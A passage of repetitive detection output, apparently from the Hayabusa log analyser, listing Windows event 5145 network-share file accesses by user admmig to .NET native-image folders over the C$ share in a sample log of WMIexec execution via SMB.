Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 